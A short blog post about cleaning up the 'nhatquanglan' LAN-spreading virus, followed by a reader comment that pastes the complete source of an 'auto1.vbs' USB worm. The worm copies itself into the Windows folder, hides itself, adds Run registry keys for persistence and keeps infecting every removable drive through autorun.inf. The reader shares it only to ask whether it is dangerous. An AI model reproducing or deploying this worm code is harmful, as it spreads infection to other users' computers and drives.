solution for nhatquanglan found

i had to install this virus to find out what does it do. Then i found out the step by step solution fot this. it spreads deadly via LAN. When i installed , it sent its offsprings to all the accessible shared folders on the network. Here’s how you can fix the problem

https://piyushlabs.wordpress.com/nhatquanglan-new-folder-svchost/

One more problem, my friend JD’s pen drive not working. Its showing some write protection error. I’ll soon find out whats behind that.. wish me good luck.

Tags: , , , , , , , , , , , , ,

21 Responses to “solution for nhatquanglan found”

  1. Kazuchi Says:

    I opened one of my Pen drives… and found this “Auto1.vbs” and “autorun.inf”

    Now i opened the VBS file in Notepad… and here what it says:
    Shall i click on it… or is it just a way of infecting more?

    On Error Resume Next
    Dim fso, wscr, tf, scrText, win, ax

    Set fso = CreateObject(“Scripting.FileSystemObject”)
    Set wscr = CreateObject(“WScript.Shell”)

    win = fso.GetSpecialFolder(0)
    tf = WScript.ScriptFullName
    x = LCase(tf)

    If Mid(x, 4) = “auto1.vbs” Then
    wscr.Run “explorer.exe ” & fso.Getfile(tf).Drive.Path
    End If

    Set myFile = fso.Getfile(tf).OpenAsTextStream(1)
    Do Until myFile.AtEndOfStream
    scrText = scrText & myFile.ReadLine & vbCrLf
    Loop

    ax = fso.FileExists(win & “\auto1.vbs”)

    Set myFile = fso.CreateTextFile(win & “\auto1.vbs”, true)
    myFile.write scrText
    myFile.close

    Set fAttr = fso.Getfile(win & “\auto1.vbs”)
    fAttr.Attributes=39

    wscr.RegWrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\autoMe1”, “wscript.exe “”” & win & “\auto1.vbs”””

    If ax = false Then wscr.Run “wscript.exe “”” & win & “\auto1.vbs”””

    While (true)

    Set myDrives = fso.Drives
    For Each myFlashDrive In myDrives

    If myFlashDrive.Drivetype = 1 And myFlashDrive.Path “A:” Then

    If fso.FileExists(myFlashDrive.Path & “\Autorun.inf”) Then
    Set fAttr = fso.Getfile(myFlashDrive.Path & “\Autorun.inf”)
    fAttr.Attributes=32
    fso.Deletefile myFlashDrive.Path & “\Autorun.inf”, true
    End If

    Set auFile = fso.CreateTextFile(myFlashDrive.Path & “\Autorun.inf”, true)
    auFile.write “[autorun]” & vbCrLf & “open=wscript.exe auto1.vbs” & vbCrLf & “shell\Open\Command=wscript.exe auto1.vbs” & vbCrLf & “shell\Open\Default=1”
    auFile.close

    Set fAttr = fso.Getfile(myFlashDrive.Path & “\Autorun.inf”)
    fAttr.Attributes=39

    Set myFile = fso.CreateTextFile(myFlashDrive.Path & “\auto1.vbs”, true)
    myFile.write scrText
    myFile.close

    Set fAttr = fso.Getfile(myFlashDrive.Path & “\auto1.vbs”)
    fAttr.Attributes=39

    End If

    Next

    With wscr
    .RegWrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\autoMe”, “wscript.exe “”” & win & “\auto1.vbs”””
    .RegWrite “HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden”, 0, “REG_DWORD”
    .RegWrite “HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt”, 0, “REG_DWORD”
    .RegWrite “HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden”, 1, “REG_DWORD”
    .RegWrite “HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions”, 0, “REG_DWORD”
    .RegWrite “HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDriveTypeAutoRun”, 128, “REG_DWORD”
    .RegWrite “HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools”, 0, “REG_DWORD”
    .RegWrite “HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr”, 0, “REG_DWORD”
    End With

    If tf win & “\auto1.vbs” Then
    If fso.Getfile(tf).Drive.IsReady = false Then WScript.Quit
    End If

    WScript.Sleep 10000

    Wend

Comments are closed.


%d bloggers like this: